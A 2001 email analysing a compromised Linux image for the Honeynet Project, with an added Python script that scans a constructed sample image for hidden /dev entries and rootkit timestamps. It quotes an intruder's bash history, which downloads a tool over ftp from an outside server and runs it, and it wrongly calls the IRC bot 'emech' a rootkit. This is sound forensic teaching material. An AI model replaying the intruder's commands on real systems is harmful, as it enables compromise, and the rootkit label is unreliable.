From wolfgang.berbig@gmx.net Fri May 25 19:40:31 2001
Date: Sat, 26 May 2001 01:52:47 +0200
From: 'Wolfgang Berbig'
Reply-To: admin@home.lan
To: project@honeynet.org
Subject: Scan of the Month (May)

Hello Honeynet people,

first one thing: I'm not a security professional, I'm only an operator, or, if you like it better, a system maintainer. But it's a kind of passion to stay up to date with security issues.

Now let's get to your root image:

The first thing(s) I found (after 2 minutes) were the two text files located in /dev:

    -rw-r--r--   1 root     root           87 Mar 16 01:45 last
    -rw-r--r--   1 root     root           71 Mar 16 01:45 rpm

The first one contains network addresses and a few other numbers. The latter contains (I think) program names like linsniffer, smurf and the like.

After that, I found two suspicious modifications within the file /etc/rc.d/rc.sysinit:

    } &
    /usr/bin/lsattr -t1 -X53 -p

The first one I couldn't find in your root image (maybe in the /usr partition?). I've seen (on other systems) a binary named "[", but never one named "}". It is possibly a link to an sshd trojan or a sniffer (see below). AFAIK there are no such command line options for lsattr, so maybe a trojan, too?

After that, I didn't know where to look for parts of the rootkit. :-(

I searched for files with the modification date of the two found in /dev (stupid, isn't it?), and I found the following:

    drwxr-xr-x   2 root     root         1024 May 25 22:22 dev/ida/.drag-on/
    drwxr-xr-x   2 root     root         1024 Mar 16 01:45 dev/ida/..      <-- reads ".. "

Both directories have the same content:

    drwxr-xr-x   2 root     root         1024 May 25 22:22 .
    drwxrwxr-x   4 root     root        12288 Mar 16 01:45 ..
    -rwx------   1 root     root         7165 Mar 16 01:45 linsniffer
    -rwx------   1 root     root           75 Mar 16 01:45 logclear
    -rwxr-xr-x   1 root     root       632066 Mar 16 01:45 mkxfs
    -rw-r--r--   1 root     root          708 Mar 16 01:45 s
    -rwxr-xr-x   1 root     root         4060 Mar 16 01:45 sense
    -rwx------   1 root     root         8268 Mar 16 01:45 sl2
    -rw-------   1 root     root          540 Mar 16 01:45 ssh_host_key
    -rw-------   1 root     root          512 Mar 16 14:45 ssh_random_seed
    -rw-r--r--   1 root     root          138 Mar 16 16:28 tcp.log

The two ssh* files belong to the binary "mkxfs", which is a trojaned version of sshd (V 1.2.27, statically linked). "s" is the sshd_config, "sl2" seems to be a portscanner, "linsniffer" of course a password sniffer, "sense" is a perl tool, "logclear" a shell tool for the password sniffer, and tcp.log is the sniffer's logfile. The trojan sshd listens on port 5 (-> "s").

The last interesting file I found was the .bash_history. The intruder obviously failed to clean that file:

    exec tcsh
    ls
    mkdir /var/...
    ls
    cd /var/...
    ftp ftp.home.ro
    tar -zxvf emech-2.8.tar.gz
    cd emech-2.8
    ./configure
    y
    make
    make
    make install
    mv sample.set mech.set
    pico mech.set
    ./mech
    cd /etc
    pico ftpaccess
    ls
    exit

As you can see, this guy used a rootkit named "emech" from a Romanian (?) ftp server. But you didn't provide the /var filesystem in your image ...

This rootkit modified the /etc/services. There are no unknown entries (for me). Also the /etc/inetd.conf was modified. In this file, I didn't see anything unusual, only one thing was wrong with it (in my opinion): there were not many active services, maybe the rootkit commented out a few (dangerous) daemons?

Your last "Scan of the Month" was nice to read. I didn't know how much information one could get from a snort log. I think you do a great work with your "Honeynet Project". Congratulations especially to Lance for his excellent Whitepapers on his homepage.

--
Kind regards,
Wolfgang Berbig
MCSE - Must Consult Someone Experienced
E-Mail: wolfgang.berbig@gmx.net

--
I worry that 10 or 15 years from now, my children will come to me and say: 'Daddy, where were you when they took freedom of the press away from the Internet?'
- Mike Godwin (from: http://freenet.sourceforge.net)
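The two searches the message describes by hand, looking for things that do not belong in /dev (regular text files, directories named like ".. " with a trailing space or hidden with a leading dot) and pivoting on the modification time of the first suspicious files, can be scripted against a mounted image. The following Python is an added example written for this page, not code from the message or from the Honeynet Project; it builds a constructed miniature of the image in a temporary directory (the file names and the 16 Mar 2001 01:45 timestamp are taken from the listings above, the contents are dummies) and runs both checks over it. The function names are the example's own.

```python
import os
import shutil
import stat
import tempfile
from datetime import datetime


def odd_name(name):
    """True for a directory entry that imitates "." / ".." (e.g. ".. " with a
    trailing space, or "..."), carries leading/trailing whitespace, or is a
    dot-prefixed hidden entry. Real "." and ".." are never reported."""
    if name in (".", ".."):
        return False
    core = name.strip()
    return core == "" or set(core) == {"."} or name != core or name.startswith(".")


def scan_dev(root):
    """Walk <root>/dev of a mounted image and list what does not belong there:
    oddly named or hidden directories, and regular files (a genuine /dev holds
    device nodes, symlinks and a few directories, not text files or binaries).
    Returns sorted (kind, path relative to root) tuples."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(os.path.join(root, "dev")):
        for d in dirnames:
            if odd_name(d):
                findings.append(("odd-dir", os.path.relpath(os.path.join(dirpath, d), root)))
        for f in filenames:
            path = os.path.join(dirpath, f)
            if stat.S_ISREG(os.lstat(path).st_mode):  # lstat: do not follow symlinks
                findings.append(("regular-file", os.path.relpath(path, root)))
    return sorted(findings)


def entries_with_mtime(root, target_mtime, tolerance=1.0):
    """The timeline pivot used in the message: every file or directory whose
    modification time lies within <tolerance> seconds of a known rootkit time."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if abs(os.lstat(path).st_mtime - target_mtime) <= tolerance:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample_image():
    """Constructed miniature of the compromised root, laid out like the listings
    in the message (contents are dummies). Returns (mount_point, rootkit_mtime)."""
    root = tempfile.mkdtemp(prefix="sotm_")
    rk_time = datetime(2001, 3, 16, 1, 45).timestamp()
    other_time = datetime(2001, 1, 10, 12, 0).timestamp()   # an untouched file
    layout = {
        "dev/last": rk_time, "dev/rpm": rk_time,
        "dev/ida/.. /linsniffer": rk_time, "dev/ida/.. /mkxfs": rk_time,
        "dev/ida/.drag-on/linsniffer": rk_time,
        "etc/passwd": other_time, "etc/rc.d/rc.sysinit": rk_time,
    }
    for rel, mtime in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.utime(path, (mtime, mtime))
    # the two hiding directories carry the rootkit timestamp as well
    for rel in ("dev/ida/.. ", "dev/ida/.drag-on"):
        os.utime(os.path.join(root, rel), (rk_time, rk_time))
    return root, rk_time


def remove_sample_image(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    root, rk_time = build_sample_image()
    try:
        for kind, path in scan_dev(root):
            print(f"{kind:13} {path!r}")          # repr() makes the trailing space visible
        print("entries sharing the rootkit mtime:")
        for path in entries_with_mtime(root, rk_time):
            print("  ", repr(path))
    finally:
        remove_sample_image(root)
```

Printing paths with repr() is deliberate: the whole point of the ".. " name is that a plain listing shows it as the parent directory. On a real image, run the two functions against the mount point of the read-only loop mount, and remember that an mtime pivot only finds what the intruder did not touch afterwards; the .drag-on directory above has a later timestamp precisely because it was modified again.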